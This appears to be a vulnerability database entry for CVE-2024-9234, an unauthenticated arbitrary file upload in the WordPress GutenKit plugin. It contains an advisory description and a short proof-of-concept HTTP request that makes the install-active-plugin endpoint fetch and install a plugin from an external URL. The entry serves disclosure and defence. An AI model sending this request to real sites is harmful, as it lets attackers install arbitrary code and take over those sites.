Lucene search
K

WordPress GutenKit 2.1.0 Arbitrary File Upload Vulnerability

🗓️ 02 Jan 2025 00:00:00Reported by RandomRobbieBFType 
zdt
 zdt
🔗 0day.today👁 406 Views

GutenKit plugin allows unauthenticated file uploads, risking plugin installations (CVE-2024-9234).

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2024-9234
17 Oct 202418:48
githubexploit
GithubExploit
Exploit for CVE-2024-9234
28 Dec 202411:00
githubexploit
Circl
CVE-2024-9234
11 Oct 202416:10
circl
CNNVD
WordPress plugin GutenKit 安全漏洞
11 Oct 202400:00
cnnvd
CVE
CVE-2024-9234
11 Oct 202406:50
cve
Cvelist
CVE-2024-9234 GutenKit <= 2.1.0 - Unauthenticated Arbitrary File Upload
11 Oct 202406:50
cvelist
Nuclei
GutenKit <= 2.1.0 - Arbitrary File Upload
1 Jun 202605:38
nuclei
NVD
CVE-2024-9234
11 Oct 202413:15
nvd
Patchstack
WordPress GutenKit Plugin <= 2.1.0 is vulnerable to Arbitrary File Upload
10 Oct 202400:00
patchstack
Patchstack
WordPress GutenKit plugin <= 2.1.0 - Unauthenticated Arbitrary File Upload vulnerability
10 Oct 202420:11
patchstack
Rows per page
# CVE-2024-9234
GutenKit <= 2.1.0 - Unauthenticated Arbitrary File Upload

# Description
The GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.

```
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon
```

Download Link: [Download gutenkit-blocks-addon Version 2.1.0](https://downloads.wordpress.org/plugin/gutenkit-blocks-addon.2.1.0.zip)

POC
--

```
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114

{
  "plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
  "slug": "popularis-extra"
}
```

```
{"success":true,"data":"Plugin installed successfully!"}
```

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jan 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.19.8
EPSS0.93403
SSVC
406